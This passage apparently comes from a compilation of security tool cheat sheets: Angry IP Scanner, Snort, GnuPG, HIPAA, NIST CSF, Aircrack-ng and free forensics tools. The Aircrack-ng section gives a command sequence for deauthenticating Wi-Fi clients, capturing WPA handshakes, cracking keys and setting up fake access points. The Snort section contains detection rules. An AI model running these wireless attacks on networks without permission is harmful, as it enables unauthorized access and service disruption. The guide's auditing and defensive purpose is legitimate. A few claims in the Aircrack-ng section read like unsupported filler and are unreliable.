Command-Line Interface (CLI): Automate scans and integrate with scripts .
Export Results: Save results as CSV, TXT, XML, or IP-Port list for further analysis .
Angry IP Scanner can be run from the command line for automation:
ipscan [options]
Common Options:
-r <range>
: Specify IP range (e.g., -r 192.168.1.1-254
)
-p <ports>
: Specify ports (e.g., -p 80,443,8080
)
-o <file>
: Output results to a file (CSV, TXT, XML)
-t <threads>
: Set number of threads
-f <fetchers>
: Specify data fetchers (e.g., hostname, mac)
Example:
ipscan -r 192.168.1.1-254 -p 22,80,443 -o results.csv -t 200
This scans the specified IP range for ports 22, 80, and 443, using 200 threads, and saves results to results.csv
.
Export Formats: CSV, TXT, XML, IP-Port list.
Customizable Fields: Choose which columns to include in exports.
Integration: Exported data can be imported into spreadsheets, SIEMs, or other network management tools .
Increase Threads: Raise thread count for faster scans, but beware of network/device limits.
Limit Scan Range: Scan only necessary IPs/ports to reduce load.
Optimize Fetchers: Disable unnecessary data fetchers to speed up scans.
Batch Scanning: Use CLI for scheduled or automated scans .
Use Responsibly: Scanning can trigger security alerts or violate policies. Always have authorization.
Avoid Overloading Networks: High thread counts can cause network congestion or device instability.
Data Privacy: Be cautious with exported data; it may contain sensitive network information.
Update Regularly: Keep Angry IP Scanner and Java updated to mitigate vulnerabilities .
Network Inventory: Discover all devices on a subnet.
Security Audits: Identify unauthorized or rogue devices.
Port Auditing: Check for open or vulnerable ports on network devices.
Troubleshooting: Diagnose connectivity issues by verifying device presence .
If No Results: Check firewall settings, network connectivity, and Java installation.
Slow Scans: Increase thread count or reduce scan range.
Permission Issues: Run as administrator/root if needed for certain ping methods.
Community Support: Use forums and community guides for help and plugin recommendations .
Regular Updates: Always use the latest version for bug fixes and new features.
Scan local subnet
Enter 192.168.1.1-254
in IP range, click Start
Scan specific ports
Enter ports (e.g., 22,80,443
) in Ports field
Export results
File > Export > Choose format (CSV, TXT, XML)
Increase scan speed
Edit > Preferences > Performance > Increase thread count
Command-line scan
ipscan -r 10.0.0.1-10.0.0.254 -p 80,443 -o scan.csv
Add data fetcher
Tools > Fetchers > Add/Remove columns
Use plugin
Tools > Plugins > Manage
Troubleshoot connectivity
Check firewall, run as admin/root, verify Java installation
Angry IP Scanner is a powerful, flexible, and user-friendly tool for network discovery and security auditing. Its cross-platform nature, plugin support, and automation capabilities make it suitable for a wide range of network management tasks. By following best practices and leveraging its advanced features, users can efficiently manage and secure their networks .
Use Angry IP Scanner responsibly and always ensure you have permission to scan the networks you target.
Snort is a powerful, open-source network intrusion detection and prevention system (NIDS/NIPS) widely used in cybersecurity. This guide provides a thorough overview, practical cheat sheet, and best practices for deploying, configuring, and troubleshooting Snort.
What is Snort?
Snort is an open-source NIDS/NIPS that performs real-time traffic analysis and packet logging on IP networks.
It detects a wide range of attacks and probes, including buffer overflows, port scans, CGI attacks, SMB probes, and OS fingerprinting attempts .
Key Features:
Packet Sniffing: Captures and analyzes network packets in real-time.
Logging: Stores packets for later analysis.
Intrusion Detection: Uses a rule-based language to detect anomalies and threats.
Preprocessor Plugins: Normalize and preprocess data before analysis.
Detection Engine: Applies rules to network traffic to identify suspicious activity .
Architecture Overview:
Packet Decoder: Decodes packet headers for analysis.
Preprocessors: Modify/normalize packet data.
Detection Engine: Analyzes packets using rules.
Logging/Alerting System: Logs events and generates alerts.
Output Modules: Integrate with other systems/formats .
Ensure your hardware meets the minimum requirements: sufficient RAM, disk space, and compatible CPU.
Check OS compatibility (Linux, Windows, macOS) .
On Linux (Ubuntu Example)
sudo apt-get update
sudo apt-get install snort
During installation, you may be prompted to configure the network interface and HOME_NET variable.
On Windows
Download the Snort installer from the official website.
Run the installer and follow the prompts.
Configure environment variables and update the snort.conf file as needed .
General Setup Process
Prepare the system (patches, disk space, drivers).
Install Snort and dependencies.
Configure network interfaces for monitoring.
Update and configure rule sets.
Test the installation with sample traffic .
Snort 3: Uses Lua-based configuration (snort.lua
, snort_defaults.lua
).
Snort 2: Uses snort.conf
(can be converted to Lua with snort2lua
tool) .
HOME_NET: Defines the protected network.
EXTERNAL_NET: Defines untrusted networks.
Rule Paths: Location of rule files.
Preprocessors: Enable/disable and configure as needed.
Output Plugins: Specify alert/log output formats .
Use --lua
flag for custom Lua configurations in Snort 3 .
A Snort rule consists of a header and options:
action protocol src_ip src_port direction dst_ip dst_port (options)
Example Rule
alert tcp $EXTERNAL_NET 80 -> $HOME_NET any (msg:"Attack attempt!"; flow:to_client,established; file_data; content:"1337 hackz 1337",fast_pattern,nocase; service:http; sid:1;)
Action: alert, block, drop, etc.
Protocol: tcp, udp, icmp, etc.
Source/Destination: IPs and ports.
Direction: -> or <-
Options: msg, flow, content, service, sid, rev, etc.
Be precise to avoid false positives.
Regularly update and optimize rules.
Avoid overly broad or incorrect syntax.
Leverage community and expert-contributed rules .
Intrusion Detection/Prevention: Real-time threat detection and blocking.
Network Monitoring: Anomaly detection and traffic analysis.
Security Log Analysis: Forensics and incident response.
Endpoint Security Complement: Monitors traffic to/from endpoints .
Network Segmentation: Monitor traffic between network segments.
Cloud Environments: Secure cloud-based resources.
Remote Work: Monitor remote device traffic .
Regular Updates: Keep Snort and rule sets up to date.
Integration: Combine with firewalls, SIEMs, and other security tools.
Continuous Monitoring: Implement 24/7 monitoring and incident response plans.
User Education: Train users to recognize and report threats .
Identify the Problem: Check logs, error messages, and system status.
Establish Theory: Isolate probable causes (e.g., rule conflicts, performance bottlenecks).
Test and Implement Solutions: Adjust configurations, update rules, or patch software.
Verify and Document: Ensure the issue is resolved and document the solution for future reference .
Engage with forums, mailing lists, and documentation repositories (e.g., Cisco, Red Hat).
Review real-world case studies for practical insights and solutions .
Cloud IDS: Snort deployed in cloud environments for scalable threat detection.
DNS Intrusion Detection: Custom Snort integration for DNS traffic analysis.
Zero-Day Detection: SnortML framework for machine learning-based detection.
Personal Experience: Used as a packet sniffer, logger, and IDS/IPS in various environments .
# Test configuration
snort -T -c /etc/snort/snort.conf
# Run Snort in IDS mode
snort -c /etc/snort/snort.conf -i eth0
# Run Snort in packet logger mode
snort -l /var/log/snort -c /etc/snort/snort.conf
# Specify a custom rule file
snort -c /etc/snort/myrules.rules
# Basic Rule Structure
action protocol src_ip src_port direction dst_ip dst_port (options)
# Example: Alert on HTTP traffic containing "malware"
alert tcp $EXTERNAL_NET any -> $HOME_NET 80 (msg:"Possible malware download"; content:"malware"; http_uri; sid:1000001; rev:1;)
# Common Options
msg:"Description"; # Message to display
sid:1000001; # Unique rule ID
rev:1; # Revision number
content:"string"; # Match content
nocase; # Case-insensitive match
flow:to_server,established; # Flow direction and state
service:http; # Application protocol
Default log location: /var/log/snort/
Alert formats: fast, full, unified2, syslog, etc.
Snort is a versatile and robust tool for network intrusion detection and prevention. By understanding its architecture, mastering rule writing, following best practices, and leveraging community resources, you can deploy and maintain an effective Snort-based security solution for a wide range of environments—from traditional networks to cloud and remote work scenarios .
Use this guide and cheat sheet as a reference for installation, configuration, rule writing, troubleshooting, and best practices to maximize your use of Snort in cybersecurity operations.
GNU Privacy Guard (GnuPG or GPG) is a powerful, open-source tool for secure communication and data storage. It implements the OpenPGP standard (RFC 4880, now RFC 9580) and is widely used for encrypting, decrypting, signing, and verifying data and communications. This guide provides a thorough overview, practical cheat sheet, and best practices for using GnuPG effectively.
What is GnuPG? GnuPG is a free software suite for encryption and signing of data and communications, compliant with the OpenPGP standard. It uses a hybrid encryption model: symmetric-key cryptography for speed and public-key cryptography for secure key exchange .
Core Components:
Key Management System: Generate, manage, and exchange public/private key pairs.
Encryption & Signing: Supports RSA, ElGamal, DSA, and AES algorithms.
Libgcrypt: Provides cryptographic functions, including elliptic-curve cryptography.
Frontends: Command-line tool with GUI frontends like Seahorse (GNOME) and KGPG (KDE).
Protocols: Supports OpenPGP, S/MIME, and SSH .
Supported OS: Windows, macOS, Linux, RISC OS, Android .
System Requirements:
Windows: Compatible with modern versions (e.g., Windows 10+), requires at least 1 GHz CPU, 1–2 GB RAM.
Linux/macOS: Check distribution compatibility and install via package manager (e.g., apt
, yum
, brew
).
Installation Steps:
Download from official GnuPG site.
Install using the provided installer or package manager.
Verify installation: gpg --version
.
Configuration:
GnuPG stores configuration and keyrings in ~/.gnupg
by default .
gpg --gen-key
Follow prompts for name, email, key type, size, and expiration .
gpg --list-keys # List public keys
gpg --list-secret-keys # List private keys
gpg --export -a "User Name" > publickey.asc
gpg --export-secret-keys -a "User Name" > privatekey.asc
-a
outputs in ASCII-armored format .
gpg --import publickey.asc
Generate a revocation certificate (do this when you create your key!):
gpg --output revoke.asc --gen-revoke your@email.com
Import the revocation certificate if needed:
gpg --import revoke.asc
Sign someone’s public key to certify it:
gpg --sign-key email@example.com
Set trust level:
gpg --edit-key email@example.com
# Then use the 'trust' command in the interactive prompt
gpg --encrypt --recipient recipient@email.com file.txt
Output: file.txt.gpg
(encrypted file) .
gpg --decrypt file.txt.gpg
Outputs decrypted content to stdout or file .
gpg --sign file.txt
Creates file.txt.gpg
(signed and encrypted).
To create a detached signature:
gpg --detach-sign file.txt
gpg --verify file.txt.gpg
gpg --verify file.txt.sig file.txt
gpg --encrypt --sign --recipient recipient@email.com file.txt
Thunderbird + Enigmail (or built-in OpenPGP support in recent Thunderbird versions).
Mailvelope for webmail.
Process:
Generate/import keys in GnuPG.
Configure email client to use GnuPG.
Share public key with contacts.
Encrypt/sign emails as needed .
Sign commits:
git config --global user.signingkey <key-id>
git commit -S -m "Your commit message"
Verify signed commits: Platforms like GitHub and GitLab display commit verification status .
Python: Use python-gnupg
for programmatic access.
S/MIME and SSH: GnuPG can manage S/MIME certificates and SSH keys .
Key Management:
Use strong passphrases for private keys.
Regularly rotate keys and subkeys.
Backup keys and revocation certificates securely.
Revoke and replace compromised keys immediately .
Algorithm Selection:
Use strong, modern algorithms (e.g., RSA 4096-bit, ECC).
Avoid deprecated algorithms.
Verification:
Always verify signatures on received files and messages.
Check key fingerprints before trusting/importing keys .
Updates:
Keep GnuPG and related software up to date to patch vulnerabilities .
User Education:
Train users on secure key handling and the importance of encryption .
Cannot Decrypt:
Ensure the correct private key is in your keyring.
Check file permissions on ~/.gnupg
.
Signature Verification Fails:
Import the sender’s public key.
Check for key expiration or revocation.
Key Not Trusted:
Set trust level using gpg --edit-key
and the trust
command.
General Help:
gpg --help
for command options.
Consult official documentation and community forums for support .
Generate keypair
gpg --gen-key
List public keys
gpg --list-keys
List private keys
gpg --list-secret-keys
Export public key
gpg --export -a "User Name" > publickey.asc
Export private key
gpg --export-secret-keys -a "User Name" > privatekey.asc
Import key
gpg --import publickey.asc
Encrypt file
gpg --encrypt --recipient user@email.com file.txt
Decrypt file
gpg --decrypt file.txt.gpg
Sign file
gpg --sign file.txt
Detached signature
gpg --detach-sign file.txt
Verify signature
gpg --verify file.txt.sig file.txt
Generate revocation cert
gpg --output revoke.asc --gen-revoke your@email.com
Sign another’s key
gpg --sign-key email@example.com
Edit key (set trust, etc.)
gpg --edit-key email@example.com
List fingerprints
gpg --fingerprint
Official Documentation: https://gnupg.org/documentation/
Community Forums & Mailing Lists: https://gnupg.org/community/
Tutorials: YouTube, technical blogs, and course platforms.
Integration Guides: Search for specific guides for your email client, Git, or other software .
Email Encryption
Securely send/receive emails; verify sender identity
File Encryption
Protect sensitive files at rest or in transit
Software Signing
Sign software releases to ensure authenticity
Secure Messaging
Encrypt messages in chat or collaboration tools
Git Commit Signing
Verify code authorship and integrity in version control
By following this guide and cheat sheet, you can confidently use GnuPG for a wide range of security and privacy tasks, from personal email encryption to professional software signing and secure development workflows .
HIPAA Comprehensive Summary Guide & Cheat Sheet (2025)
HIPAA stands for the Health Insurance Portability and Accountability Act of 1996. It is a federal law designed to protect sensitive patient health information from being disclosed without the patient's consent or knowledge.
1. Privacy Rule
Purpose: Protects the privacy of individually identifiable health information (PHI).
Who Must Comply: Health care providers, health plans, and health care clearinghouses (collectively called "covered entities"), and their business associates.
What’s Protected: All forms of PHI—oral, paper, and electronic.
Permitted Uses/Disclosures: For treatment, payment, health care operations, and certain public interest activities (e.g., law enforcement, public health) .
Patient Rights: Right to access, amend, and receive an accounting of disclosures of their PHI.
2. Security Rule
Purpose: Sets standards for safeguarding electronic PHI (ePHI).
Safeguards Required:
Administrative: Policies, workforce training, risk analysis.
Physical: Facility access controls, workstation security.
Technical: Access controls, audit controls, encryption.
3. Breach Notification Rule
Purpose: Requires covered entities to notify affected individuals, HHS, and sometimes the media of a breach of unsecured PHI.
Timeline: Notification must be made without unreasonable delay and no later than 60 days after discovery.
4. Enforcement Rule
Purpose: Establishes procedures for investigations, penalties, and hearings for HIPAA violations.
Protected Health Information (PHI) includes any information that can identify an individual and relates to their health status, provision of health care, or payment for health care. Examples: names, addresses, birth dates, Social Security numbers, medical records, lab results, insurance information.
Covered Entities: Health care providers, health plans, health care clearinghouses.
Business Associates: Vendors and subcontractors who handle PHI on behalf of covered entities.
Appoint a HIPAA Privacy & Security Officer
Conduct regular risk assessments
Implement written policies and procedures
Train all workforce members on HIPAA
Secure all forms of PHI (paper, oral, electronic)
Limit PHI access to only those who need it
Use secure methods for transmitting PHI (encryption, secure email)
Have a breach notification process in place
Maintain documentation of compliance efforts
Review and update policies regularly.
Unauthorized access to PHI
Failure to perform risk assessments
Lack of employee training
Improper disposal of PHI
Lost or stolen devices containing ePHI
Failure to notify affected parties after a breach
Access: Patients can request and obtain copies of their health records.
Amendment: Patients can request corrections to their records.
Restrictions: Patients can request restrictions on certain uses/disclosures.
Confidential Communications: Patients can request communications by alternative means or locations.
Accounting: Patients can request a record of certain disclosures.
Always verify identity before sharing PHI
Never discuss PHI in public areas
Lock computers and files when not in use
Report suspected breaches immediately
Use strong passwords and change them regularly
Shred documents containing PHI before disposal.
Proposed changes to the Security Rule: New mandates may be coming, including enhanced requirements for risk analysis, incident response, and encryption standards.
Stay updated: Regularly check for new guidance from HHS and OCR.
Rule
What It Covers
Key Actions
Privacy Rule
PHI in all forms
Limit use/disclosure, patient rights
Security Rule
ePHI
Safeguards: admin, physical, technical
Breach Rule
Breaches of PHI
Notify affected parties, HHS
Enforcement Rule
Compliance & penalties
Investigations, fines, corrective action
Bookmark this guide for quick reference and always follow your organization’s HIPAA policies!
by Alex Joseph
The NIST Cybersecurity Framework (CSF) is a set of voluntary guidelines, standards, and best practices developed by the U.S. National Institute of Standards and Technology (NIST) to help organizations manage and reduce cybersecurity risks. Originally designed for critical infrastructure, it is now widely adopted across all sectors and organization sizes, both in the U.S. and globally .
2013: Executive Order 13636 calls for improved cybersecurity for critical infrastructure.
2014: NIST CSF Version 1.0 released.
2018: Version 1.1 released, adding supply chain risk management and self-assessment enhancements.
2024: Version 2.0 released, introducing the "Govern" function and expanding global applicability .
Risk Management: Provides a flexible, scalable approach to managing cybersecurity risk.
Integration: Aligns with existing standards and best practices.
Communication: Offers a common language for internal and external cybersecurity discussions.
Continuous Improvement: Encourages regular assessment and enhancement of cybersecurity practices .
The Core is organized into six key functions (as of v2.0):
Govern
Establish and monitor the organization's cybersecurity risk management strategy, policies, and roles. (New in v2.0)
Identify
Understand the business context, resources, and risks to manage cybersecurity efforts.
Protect
Implement safeguards to ensure delivery of critical services.
Detect
Identify the occurrence of cybersecurity events.
Respond
Take action regarding detected cybersecurity incidents.
Recover
Restore capabilities or services impaired by cybersecurity incidents.
Each function is divided into categories and subcategories detailing specific activities and outcomes .
Tiers describe the degree to which an organization’s cybersecurity risk management practices exhibit the characteristics defined in the framework:
1
Partial: Ad hoc, reactive, limited awareness of risks.
2
Risk-Informed: Some risk management, but not standardized across the organization.
3
Repeatable: Formalized, standardized, and regularly updated practices.
4
Adaptive: Continuous improvement, proactive, integrated into organizational culture.
Tiers are not maturity levels but benchmarks for improvement .
Current Profile: Describes the organization’s current cybersecurity posture.
Target Profile: Describes the desired state of cybersecurity.
Gap Analysis: Comparing profiles helps identify and prioritize improvement actions .
Establishes and monitors cybersecurity risk management strategy, policies, and roles.
Ensures alignment with organizational objectives and regulatory requirements .
Asset Management: Inventory of data, personnel, devices, systems, and facilities.
Business Environment: Understanding mission, objectives, and critical functions.
Governance: Policies, procedures, and processes for cybersecurity.
Risk Assessment: Identifying and evaluating risks.
Risk Management Strategy: Defining risk tolerance and priorities.
Supply Chain Risk Management: Managing third-party and supply chain risks .
Identity Management & Access Control: Managing access to assets.
Awareness & Training: Ensuring personnel are trained.
Data Security: Protecting data confidentiality, integrity, and availability.
Information Protection Processes: Policies and procedures for protection.
Maintenance: Regular maintenance of systems.
Protective Technology: Implementing technical security solutions .
Anomalies & Events: Detecting unusual activity.
Continuous Monitoring: Ongoing monitoring of systems.
Detection Processes: Testing and maintaining detection capabilities .
Response Planning: Executing response plans.
Communications: Coordinating internal and external communications.
Analysis: Analyzing incidents and response effectiveness.
Mitigation: Containing and mitigating incidents.
Improvements: Incorporating lessons learned .
Recovery Planning: Restoring services and capabilities.
Improvements: Updating recovery strategies.
Communications: Coordinating recovery communications .
Flexible & Scalable: Adaptable to any organization, regardless of size or sector.
Not Prescriptive: Complements, not replaces, existing cybersecurity programs.
Risk-Based: Focuses on managing cybersecurity as an ongoing risk management process .
Healthcare: Enhanced cybersecurity posture through CSF adoption.
Financial Services: Standardized security across subsidiaries.
Utilities: Improved incident response and resilience.
Local Government: Assessed and improved cybersecurity using CSF.
Cloud Providers: Achieved regulatory compliance and structured controls.
Small Businesses: Protected data and improved security with CSF .
Govern
Risk Management Strategy, Policy Development, Roles & Responsibilities
Identify
Asset Management, Business Environment, Governance, Risk Assessment, Supply Chain Risk Management
Protect
Access Control, Awareness & Training, Data Security, Maintenance, Protective Technology
Detect
Anomalies & Events, Continuous Monitoring, Detection Processes
Respond
Response Planning, Communications, Analysis, Mitigation, Improvements
Recover
Recovery Planning, Improvements, Communications
NIST Quick Start Guides: Step-by-step implementation instructions.
Resource Repository: Case studies, mappings, educational materials.
Implementation Examples: Available for various sectors and organization sizes .
The NIST CSF is a globally recognized, flexible framework for managing cybersecurity risk.
Version 2.0 introduces the "Govern" function and aligns more closely with privacy and risk management.
The framework is structured around six core functions, implementation tiers, and profiles for continuous improvement.
Widely applicable, with real-world success stories across industries.
Use this cheat sheet as a high-level guide to understanding, communicating, and implementing the NIST Cybersecurity Framework in your organization.
Aircrack-ng is a powerful suite of tools for auditing and securing Wi-Fi networks. This guide covers its fundamentals, installation, core tools, common attack/defense techniques, troubleshooting, legal/ethical considerations, and a command reference cheat sheet.
Aircrack-ng is a suite for wireless network auditing, penetration testing, and security research. It is widely used for:
Cracking WEP and WPA/WPA2-PSK keys
Capturing and analyzing Wi-Fi traffic
Performing packet injection and deauthentication attacks
Creating fake access points for testing
Architecture:
Written in C, cross-platform (Linux, Windows)
Works with wireless cards supporting monitor mode and raw packet injection
Includes tools for monitoring, attacking, testing, and cracking wireless networks .
Main Components:
Airmon-ng: Enables/disables monitor mode on wireless interfaces
Airodump-ng: Captures packets and displays network/client info
Aireplay-ng: Injects/replays packets, performs attacks (e.g., deauth)
Aircrack-ng: Cracks WEP/WPA/WPA2-PSK keys
Airbase-ng: Creates fake access points
Airgraph-ng: Visualizes network traffic
Others: Tools for decryption, packet forging, database management, etc.
Enabling monitor mode with airmon-ng
Linux (preferred, e.g., Kali Linux, Parrot OS)
Windows (limited support)
macOS (with some limitations)
Wireless card supporting monitor mode and packet injection
Sufficient system resources (RAM, CPU)
Administrative/root privileges
Update system:
sudo apt update && sudo apt upgrade
Install dependencies:
sudo apt install build-essential libssl-dev libnl-3-dev libnl-genl-3-dev ethtool pkg-config
Install Aircrack-ng:
From repo: sudo apt install aircrack-ng
From source:
git clone https://github.com/aircrack-ng/aircrack-ng.git
cd aircrack-ng
autoreconf -i
./configure
make
sudo make install
Download the latest Windows binaries from the official site.
Extract and run as administrator.
Note: Limited driver support for monitor mode and injection.
airmon-ng
Enable/disable monitor mode on wireless interfaces
airodump-ng
Capture packets, display APs/clients, save handshakes
aireplay-ng
Inject/replay packets, deauth, ARP replay, fragmentation, etc.
aircrack-ng
Crack WEP/WPA/WPA2-PSK keys using captured packets
airbase-ng
Create fake APs, perform MITM attacks
airdecap-ng
Decrypt WEP/WPA/WPA2 capture files
airgraph-ng
Visualize network traffic
airdrop-ng
Rule-based deauthentication
airolib-ng
Manage WPA/WPA2 passphrase databases
airserv-ng
Wireless card TCP/IP server
airtun-ng
Create virtual tunnel interfaces
packetforge-ng
Create custom encrypted packets
easside-ng
Communicate with WEP APs without key (experimental)
tkiptun-ng
WPA/TKIP attack (experimental)
wesside-ng
Automated WEP key recovery (experimental)
ivstools
Manage .ivs files (merge, convert)
makeivs-ng
Generate IVS dump files for testing
kstats
Analyze FMS algorithm votes for IVS dumps
versuck-ng
Default WEP key calculation for some routers
buddy-ng
Helper for easside-ng
WZCook
Recover WEP keys from Windows XP configs
Packet Capture & Injection: Capture Wi-Fi traffic and inject packets for analysis or attacks .
WEP/WPA/WPA2-PSK Cracking: Use captured handshakes and perform dictionary/brute-force attacks .
Deauthentication Attacks: Force clients to disconnect, capture handshake on reconnect.
Replay Attacks: Resend captured packets to generate more traffic.
Fake Access Points: Lure clients to rogue APs for MITM or credential capture .
ARP Request Replay: Generate IVs for WEP cracking.
Use Strong Encryption: Prefer WPA2/WPA3 with AES; avoid WEP .
Update Firmware: Patch routers and clients regularly.
Strong Passwords: Use complex, lengthy passphrases.
Network Monitoring: Detect deauth attacks, rogue APs.
MAC Filtering: Allow only known devices (not foolproof).
Disable SSID Broadcast: Hide network from casual scans.
Intrusion Detection Systems: Alert on suspicious activity.
User Education: Train users on Wi-Fi security best practices .
Multi-Stage Robust Optimization: Sequential decision-making under uncertainty, e.g., staged penetration tests .
Real-Time Optimization: Adjusting attack/defense strategies based on live data .
Case Studies: Used by security professionals in industries (e.g., GE, PayPal, NASA) for network audits and incident response .
Identify the Problem: Check error messages, logs, and recent changes .
Basic Checks: Ensure wireless card supports monitor mode/injection; check connections .
Gather Information: Use logs, dmesg, and Aircrack-ng output.
Analyze Causes: Compatibility, driver issues, permissions, or misconfiguration .
Implement Solutions: Try one fix at a time; e.g., switch drivers, update firmware.
Test & Verify: Confirm each step before proceeding .
Document Steps: Keep notes for future reference .
Seek Help: Use forums, GitHub issues, or community channels .
Prevent Recurrence: Regular updates, backups, and best practices .
Authorization: Only test networks you own or have explicit permission to audit. Unauthorized use is illegal .
Compliance: Follow local, national, and international laws (e.g., GDPR, CCPA).
Privacy: Handle captured data responsibly; do not misuse sensitive information .
Transparency: Disclose findings responsibly; do not exploit vulnerabilities.
Risk Management: Limit testing to avoid network disruption; use in controlled environments .
# 1. Enable monitor mode
sudo airmon-ng start wlan0
# 2. Capture packets and handshakes
sudo airodump-ng wlan0mon
# 3. Focus on a specific network (channel, BSSID)
sudo airodump-ng --bssid <BSSID> -c <channel> -w capture wlan0mon
# 4. Deauthenticate a client to capture handshake
sudo aireplay-ng --deauth 10 -a <BSSID> -c <client MAC> wlan0mon
# 5. Crack the key (WPA/WPA2)
aircrack-ng -w wordlist.txt -b <BSSID> capture-01.cap
# 6. Stop monitor mode
sudo airmon-ng stop wlan0mon
airmon-ng start wlan0
Enable monitor mode on wlan0
airmon-ng stop wlan0mon
Disable monitor mode
airodump-ng wlan0mon
Scan for networks and clients
airodump-ng --bssid <BSSID> -c <ch> -w out wlan0mon
Capture packets for a specific AP
aireplay-ng --deauth 10 -a <BSSID> wlan0mon
Deauth all clients from AP
aireplay-ng --deauth 10 -a <BSSID> -c <client>
Deauth specific client
aircrack-ng -w wordlist.txt -b <BSSID> capture.cap
Crack WPA/WPA2 handshake
airdecap-ng -w <key> capture.cap
Decrypt capture file with known key
airolib-ng db --import passwd wordlist.txt
Import wordlist into airolib-ng database
airolib-ng db --import essid <essidlist>
Import ESSIDs into airolib-ng database
airolib-ng db --batch
Batch process passphrases/ESSIDs
airbase-ng -e "FakeAP" -c 6 wlan0mon
Create a fake AP on channel 6
packetforge-ng
Create custom packets for injection
.cap
– Packet capture file (PCAP format)
.ivs
– Initialization vectors (for WEP cracking)
.hccapx
– Handshake file for hashcat
airodump-ng scanning for networks and clients
aircrack-ng performing a dictionary attack
Always use Aircrack-ng in a legal and ethical manner.
Keep your tools and wireless drivers up to date.
Use strong, unique passwords for your own networks.
Regularly audit your own Wi-Fi for vulnerabilities.
Document your process and findings for future reference.
This guide provides a comprehensive overview and quick reference for using Aircrack-ng effectively and responsibly.
This guide provides a categorized overview of the most widely used free digital forensics tools, including their core features, user/community reviews, technical requirements, and best practices for use. It is designed as a quick reference for investigators, students, and IT professionals.
Core Features: Creates forensic images of hard drives, CDs, and USB devices; supports all major OS; recovers deleted files; previews data without altering evidence.
Reviews: Highly regarded for its reliability and ease of use. Frequently recommended in forensics forums for initial evidence acquisition.
Best Practices: Always verify image hashes post-acquisition to ensure integrity.
System Requirements: Windows OS; moderate RAM and storage.
Common Pitfalls: Not a full analysis suite—use in conjunction with other tools for deeper analysis .
Core Features: Open-source GUI for The Sleuth Kit; timeline analysis, hash filtering, file recovery, keyword search, and smartphone analysis.
Reviews: Praised for its user-friendly interface and extensibility. Community support is strong, with many plugins available.
Best Practices: Use modules for specific tasks (e.g., email analysis, EXIF data extraction).
System Requirements: Windows, Linux, macOS; Java required.
Common Pitfalls: Can be resource-intensive on large datasets .
Core Features: Open-source memory analysis framework; supports Windows, Linux, macOS memory dumps; extracts running processes, network connections, registry hives, and more.
Reviews: Considered the industry standard for memory forensics. Extensive documentation and plugin ecosystem.
Best Practices: Always use the correct profile for the memory image; update plugins regularly.
System Requirements: Python-based; cross-platform.
Common Pitfalls: Steep learning curve for beginners .
Core Features: Captures physical memory from Windows systems; lightweight and portable.
Reviews: Valued for its simplicity and reliability in volatile memory acquisition.
Best Practices: Use immediately upon incident discovery to preserve volatile evidence.
System Requirements: Windows OS.
Common Pitfalls: Acquisition only—requires other tools for analysis.
Core Features: Real-time network traffic capture and analysis; supports hundreds of protocols; advanced filtering and search.
Reviews: Universally praised for its depth and flexibility. Essential for network forensics and troubleshooting.
Best Practices: Use capture filters to limit data volume; anonymize sensitive data before sharing captures.
System Requirements: Windows, Linux, macOS; network card in promiscuous mode.
Common Pitfalls: Large captures can be unwieldy; privacy concerns if not handled properly .
Core Features: Network analysis framework; logs network activity; scriptable for custom detection.
Reviews: Highly respected in enterprise environments for its scalability and depth.
Best Practices: Integrate with SIEMs for automated alerting.
System Requirements: Unix-like OS.
Common Pitfalls: Requires scripting knowledge for advanced use .
Core Features: Ubuntu-based VM with a suite of forensic tools (Autopsy, Sleuth Kit, Volatility, etc.); ready-to-use environment.
Reviews: Endorsed by SANS Institute; considered a gold standard for comprehensive investigations.
Best Practices: Use as a dedicated forensic workstation; keep VM snapshots for repeatable analysis.
System Requirements: Virtualization software (VMware/VirtualBox); moderate to high system resources.
Common Pitfalls: Large download size; may require updates for latest tool versions .
Core Features: Live Linux distribution; includes tools for disk, memory, and network forensics; user-friendly interface.
Reviews: Appreciated for its breadth and ease of use, especially for live forensics.
Best Practices: Use as a bootable environment to avoid contaminating evidence.
System Requirements: Bootable on most hardware.
Common Pitfalls: Some tools may be outdated; check for updates .
Core Features: Fast file carving based on file headers/footers; recovers files from damaged or deleted partitions.
Reviews: Known for speed and effectiveness in data recovery scenarios.
Best Practices: Customize configuration for target file types.
System Requirements: Linux, Windows.
Common Pitfalls: May produce false positives; manual review of results recommended .
Core Features: MD5-based file signature database; helps identify known files and verify integrity.
Reviews: Useful for triage and filtering known good/bad files.
Best Practices: Regularly update hash databases.
System Requirements: Windows.
Common Pitfalls: MD5 is not collision-resistant; use as part of a broader integrity strategy .
Core Features: Collects, stores, and discloses digital evidence; supports scripting and automation.
Reviews: Flexible and extensible; good for custom workflows.
Best Practices: Use scripting for repetitive tasks.
System Requirements: Windows, Linux.
Common Pitfalls: Less user-friendly than GUI-based tools.
Core Features: Modular framework for large-scale forensic analysis; supports distributed processing.
Reviews: Suited for labs and organizations with high-volume needs.
Best Practices: Deploy in environments with multiple analysts.
System Requirements: Linux.
Common Pitfalls: Complex setup; steep learning curve .
Core Features: Password cracking; supports many hash types; customizable attack modes.
Reviews: Popular for password recovery and security testing.
Best Practices: Use strong wordlists and rules for best results.
System Requirements: Windows, Linux, macOS.
Common Pitfalls: Can be slow on complex hashes .
Core Features: Wi-Fi security assessment; packet capture, injection, and key cracking.
Reviews: Essential for wireless forensics; requires compatible hardware.
Best Practices: Use with a supported wireless card in monitor mode.
System Requirements: Linux, Windows.
Common Pitfalls: Legal restrictions on use; hardware compatibility issues .
Core Features: Open-source intelligence gathering; data visualization; relationship mapping.
Reviews: Highly valued for mapping digital footprints and connections.
Best Practices: Use for initial reconnaissance and link analysis.
System Requirements: Java; Windows, Linux, macOS.
Common Pitfalls: Free version has limited features .
Core Features: Web application security testing; manual vulnerability scanning.
Reviews: Good for basic web forensics; advanced features require paid version.
Best Practices: Use for manual testing and learning web vulnerabilities.
System Requirements: Java; Windows, Linux, macOS.
Common Pitfalls: Limited automation in free version.
Define Objectives: Know what you need to investigate before selecting tools.
Test in Controlled Environments: Always test tools on non-production systems first.
Document Everything: Maintain detailed logs of actions and findings.
Update Regularly: Keep tools and hash databases up to date.
Engage with Community: Participate in forums (e.g., Forensic Focus, r/computerforensics) for support and updates.
Avoid Common Pitfalls: Don’t skip compatibility checks, scalability planning, or thorough testing .
Check OS Support: Most tools support Windows and Linux; some require specific dependencies (e.g., Java, Python).
Resource Requirements: Imaging and analysis tools can be resource-intensive; ensure adequate RAM and storage.
Installation: Follow official guides; use VMs for platforms like SIFT and CAINE; troubleshoot using community FAQs .
Criminal Investigations: Tools like Autopsy and FTK Imager are used to recover deleted files and analyze suspect drives.
Incident Response: Volatility and SIFT Workstation are used to analyze memory dumps and trace malware activity.
Corporate Investigations: Wireshark and Zeek help detect data exfiltration and unauthorized access.
